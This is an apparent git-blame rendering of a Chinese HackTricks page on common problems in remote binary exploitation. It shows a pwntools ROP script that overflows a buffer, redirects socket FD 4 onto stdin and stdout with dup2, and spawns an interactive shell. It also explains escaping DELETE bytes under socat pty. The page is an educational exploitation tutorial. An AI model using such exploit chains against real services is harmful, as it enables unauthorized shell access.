2024-04-07 02:33:04 +00:00
|
|
|
|
# 常见的利用问题
|
|
|
|
|
|
2024-07-18 22:08:20 +00:00
|
|
|
|
{% hint style="success" %}
|
|
|
|
|
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
|
|
|
|
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
|
|
|
|
|
2024-04-07 02:33:04 +00:00
|
|
|
|
<details>
|
|
|
|
|
|
2024-07-18 22:08:20 +00:00
|
|
|
|
<summary>支持 HackTricks</summary>
|
2024-04-07 02:33:04 +00:00
|
|
|
|
|
2024-07-18 22:08:20 +00:00
|
|
|
|
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
|
|
|
|
|
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
|
|
|
|
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
|
2024-04-07 02:33:04 +00:00
|
|
|
|
|
|
|
|
|
</details>
|
2024-07-18 22:08:20 +00:00
|
|
|
|
{% endhint %}
|
2024-04-07 02:33:04 +00:00
|
|
|
|
|
|
|
|
|
## 远程利用中的文件描述符
|
|
|
|
|
|
2024-07-18 22:08:20 +00:00
|
|
|
|
当向远程服务器发送一个利用代码,例如调用 **`system('/bin/sh')`** 时,这将在服务器进程中执行,`/bin/sh` 将期望从 stdin (FD: `0`) 接收输入,并将输出打印到 stdout 和 stderr (FDs `1` 和 `2`)。因此,攻击者将无法与 shell 进行交互。
|
2024-04-07 02:33:04 +00:00
|
|
|
|
|
2024-07-18 22:08:20 +00:00
|
|
|
|
解决此问题的一种方法是假设服务器启动时创建了 **FD 编号 `3`**(用于监听),然后,您的连接将位于 **FD 编号 `4`**。因此,可以使用系统调用 **`dup2`** 将 stdin (FD 0) 和 stdout (FD 1) 复制到 FD 4(攻击者的连接),这样在执行 shell 后就可以与之联系。
|
2024-04-07 02:33:04 +00:00
|
|
|
|
|
2024-07-18 22:08:20 +00:00
|
|
|
|
[**从这里获取利用示例**](https://ir0nstone.gitbook.io/notes/types/stack/exploiting-over-sockets/exploit):
|
2024-04-07 02:33:04 +00:00
|
|
|
|
```python
|
|
|
|
|
from pwn import *
|
|
|
|
|
|
|
|
|
|
elf = context.binary = ELF('./vuln')
|
|
|
|
|
p = remote('localhost', 9001)
|
|
|
|
|
|
|
|
|
|
rop = ROP(elf)
|
|
|
|
|
rop.raw('A' * 40)
|
|
|
|
|
rop.dup2(4, 0)
|
|
|
|
|
rop.dup2(4, 1)
|
|
|
|
|
rop.win()
|
|
|
|
|
|
|
|
|
|
p.sendline(rop.chain())
|
|
|
|
|
p.recvuntil('Thanks!\x00')
|
|
|
|
|
p.interactive()
|
|
|
|
|
```
|
|
|
|
|
## Socat & pty
|
|
|
|
|
|
2024-07-18 22:08:20 +00:00
|
|
|
|
注意,socat 已经将 **`stdin`** 和 **`stdout`** 转移到套接字。然而,`pty` 模式 **包含 DELETE 字符**。因此,如果你发送 `\x7f` ( `DELETE` -),它将 **删除你利用中的前一个字符**。
|
|
|
|
|
|
|
|
|
|
为了绕过这一点,**必须在发送的任何 `\x7f` 前加上转义字符 `\x16`。**
|
2024-04-07 02:33:04 +00:00
|
|
|
|
|
2024-07-18 22:08:20 +00:00
|
|
|
|
**在这里你可以** [**找到这个行为的示例**](https://ir0nstone.gitbook.io/hackthebox/challenges/pwn/dream-diary-chapter-1/unlink-exploit)**。**
|
2024-04-07 02:33:04 +00:00
|
|
|
|
|
2024-07-18 22:08:20 +00:00
|
|
|
|
{% hint style="success" %}
|
|
|
|
|
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
|
|
|
|
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
2024-04-07 02:33:04 +00:00
|
|
|
|
|
|
|
|
|
<details>
|
|
|
|
|
|
2024-07-18 22:08:20 +00:00
|
|
|
|
<summary>支持 HackTricks</summary>
|
2024-04-07 02:33:04 +00:00
|
|
|
|
|
2024-07-18 22:08:20 +00:00
|
|
|
|
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
|
|
|
|
|
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** 上关注我们。**
|
|
|
|
|
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
2024-04-07 02:33:04 +00:00
|
|
|
|
|
|
|
|
|
</details>
|
2024-07-18 22:08:20 +00:00
|
|
|
|
{% endhint %}
|